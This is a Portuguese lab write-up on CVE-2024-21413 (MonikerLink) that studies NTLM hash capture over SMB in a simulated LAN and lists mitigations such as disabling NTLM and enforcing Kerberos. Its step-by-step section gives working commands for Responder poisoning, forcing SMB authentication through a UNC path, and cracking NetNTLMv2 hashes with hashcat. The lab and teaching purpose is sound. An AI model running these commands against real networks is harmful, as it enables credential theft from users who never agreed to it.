## https://sploitus.com/exploit?id=2C3A5503-A12E-5A08-97CF-13F543BDBB9E
# Laboratório SMB + Responder ([CVE-2024-21413](https://vulners.com/cve/CVE-2024-21413))
## 🎯 Objetivo
Este projeto teve como objetivo estudar a vulnerabilidade **CVE-2024-21413** (*MonikerLink*), explorando como o protocolo **SMB/NTLM** pode ser abusado para captura de credenciais.
Mesmo após a correção oficial da Microsoft, o laboratório mostra que o conceito continua válido em cenários internos.
---
## 📖 Exploit Theory
A vulnerabilidade CVE-2024-21413 foi classificada como **crítica** (CVSS 9.8).
Ela permitia que atacantes explorassem o Outlook enviando links `file://` ou `UNC paths` em e-mails.
Ao clicar, o cliente Outlook tentava autenticar automaticamente via **NTLM**, expondo hashes NetNTLMv2 para o atacante.
Impactos possíveis:
- **RCE (Remote Code Execution)** em cenários específicos.
- **Exfiltração de credenciais** via SMB relay ou captura offline.
No laboratório, reproduzimos apenas a parte de **captura de hashes NTLM** usando o **Responder**, simulando o vetor interno (SMB), já que o patch bloqueia o vetor externo via Outlook.
---
## 🏗️ Arquitetura do Lab
- **Atacante:** Kali Linux com Responder e Hashcat.
- **Vítima:** Windows com Outlook instalado.
- **Rede:** LAN simulada, sem exposição externa.
- **Ferramentas:**
- Responder → para envenenamento de protocolos e captura de hashes.
- Hashcat → para cracking offline dos hashes capturados.


---
## 🛡️ Patch do Outlook
Durante os testes, o Outlook bloqueou links `file://` vindos de e-mail, exibindo alerta de segurança:

### Observação
O patch [KB5002519](https://support.microsoft.com/help/5002519), lançado em fevereiro de 2024, mitiga o vetor externo via e-mail ao bloquear links `file://`.
No entanto, o protocolo NTLM continua permitindo autenticação automática em conexões SMB.
Isso significa que, embora o Outlook esteja protegido contra este exploit específico, a superfície de ataque interna permanece válida.
A raiz da questão está na dependência do NTLM como mecanismo de autenticação, que continua suscetível a captura de hashes em conexões SMB.
---
## 📊 Métricas de risco
- **CVE:** CVE-2024-21413
- **CVSS:** 9.8 (Crítico)
- **Impacto:** RCE + vazamento de credenciais
- **Vetor:** Externo (Outlook) e Interno (SMB/NTLM)
- **Mitigação recomendada:**
- Aplicar patch KB5002519.
- Desabilitar NTLM onde possível.
- Forçar Kerberos em ambientes AD.
- Implementar MFA e senhas fortes.
---
## 📚 Aprendizados
1. O patch do Outlook bloqueia apenas o clique em links externos.
2. O SMB/NTLM continua sendo uma superfície de ataque dentro da rede.
3. Hashes NetNTLMv2 podem ser capturados e quebrados offline.
4. Senhas fracas são facilmente descobertas em wordlists comuns.
5. Mesmo com correção oficial, a vulnerabilidade mantém relevância em cenários internos.
---
## 📌 Passo-a-passo
1. **Iniciar Responder**
Comando no Kali Linux:
```bash
sudo responder -I eth0
```
2. **Forçar comunicação SMB**
No Windows Explorer, acessar:
```bash
\\\test
```
3. **Captura de hash**
O Responder gera automaticamente um arquivo no diretório de logs:
```bash
/usr/share/responder/logs/SMB-NTLMv2-SSP-.txt
```
5. **Cracking com Hashcat**
Executar o comando:
```bash
hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
```
Nota:
A senha real não é exibida por questões de segurança. O objetivo é demonstrar o processo e a vulnerabilidade.
---
## ✅ Conclusão
Este laboratório evidenciou que:
- O exploit via Outlook foi bloqueado pelo patch.
- Ainda assim, é possível capturar e quebrar hashes SMB manualmente.
- A vulnerabilidade continua válida como conceito, reforçando a importância de **hardening interno**, **senhas fortes** e **migração para Kerberos/token-based auth**.